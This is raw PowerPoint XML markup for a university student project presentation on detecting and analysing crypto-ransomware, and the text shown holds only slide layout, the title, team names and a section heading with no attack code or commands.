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jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image3.jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image4.jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image5.jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image6.jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image7.jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image8.jpg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image9.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99" r:id="rId4"/>
    <p:sldId id="276" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="277" r:id="rId9"/>
    <p:sldId id="278" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="283" r:id="rId17"/>
    <p:sldId id="288" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="289" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="290" r:id="rId22"/>
    <p:sldId id="266" r:id="rId23"/>
    <p:sldId id="293" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="294" r:id="rId26"/>
    <p:sldId id="295" r:id="rId27"/>
    <p:sldId id="296" r:id="rId28"/>
    <p:sldId id="268" r:id="rId29"/>
    <p:sldId id="297" r:id="rId30"/>
    <p:sldId id="269" r:id="rId31"/>
    <p:sldId id="29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88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="32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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1197396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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3662315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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="635249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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417014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27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399905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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="905258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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-05-2024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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4246893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A27E7D1-18E9-4FCA-A891-5E948E9F1D17}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-05-2024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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="803845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27E7D1-18E9-4FCA-A891-5E948E9F1D17}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-05-2024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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1671022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27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2556412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27E7D1-18E9-4FCA-A891-5E948E9F1D17}"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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3353360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27E7D1-18E9-4FCA-A891-5E948E9F1D17}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-05-2024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024382-CAFE-4BC1-8D04-999FB0D8C64E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058137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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144661" y="225304"/>
            <a:ext cx="12018010" cy="1674817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Fraud - Detection And Analysis Of The Crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3700732" y="1969083"/>
            <a:ext cx="5106838" cy="992579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="100965" algn="just">
              <a:spcBef>
                <a:spcPts val="1950"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" spc="-5" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2011CS040035                               K.L.GEETESH</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100965" algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2011CS040034		K.KEDARI NEHA</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100965" algn="just">
              <a:lnSpc>
                <a:spcPts val="1855"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2011CS040020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" spc="-5" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		D.VINEETH KUMAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" spc="-5" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100965" algn="just">
              <a:lnSpc>
                <a:spcPts val="1855"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2011CS040001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" spc="-5" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		A.CHANDAN</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3623372" y="5088548"/>
            <a:ext cx="4941952" cy="1287018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="58419" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="104900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Department of Cyber Security </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="104900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>School of Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="104900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malla Reddy University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="104900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hyderabad, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Telangana,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-305" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0004A1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>INDIA</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="200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609600" y="4693422"/>
            <a:ext cx="1752600" cy="1680972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0C66EA92-FDDB-4258-866E-94534839C9E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553581" y="3416870"/>
            <a:ext cx="4755324" cy="979755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Guidance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" spc="-105"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of</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" spc="-40" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-40" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-40" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> P. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-40" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shanmukha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" spc="-40" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kumar</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" spc="-40" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Assistant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rofessor</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5708821" y="1408825"/>
            <a:ext cx="631594"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By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0536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43" y="0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Architectural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605287" y="1095465"/>
            <a:ext cx="10515600" cy="5668171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.1 Modules Design</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.1.1 Module 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
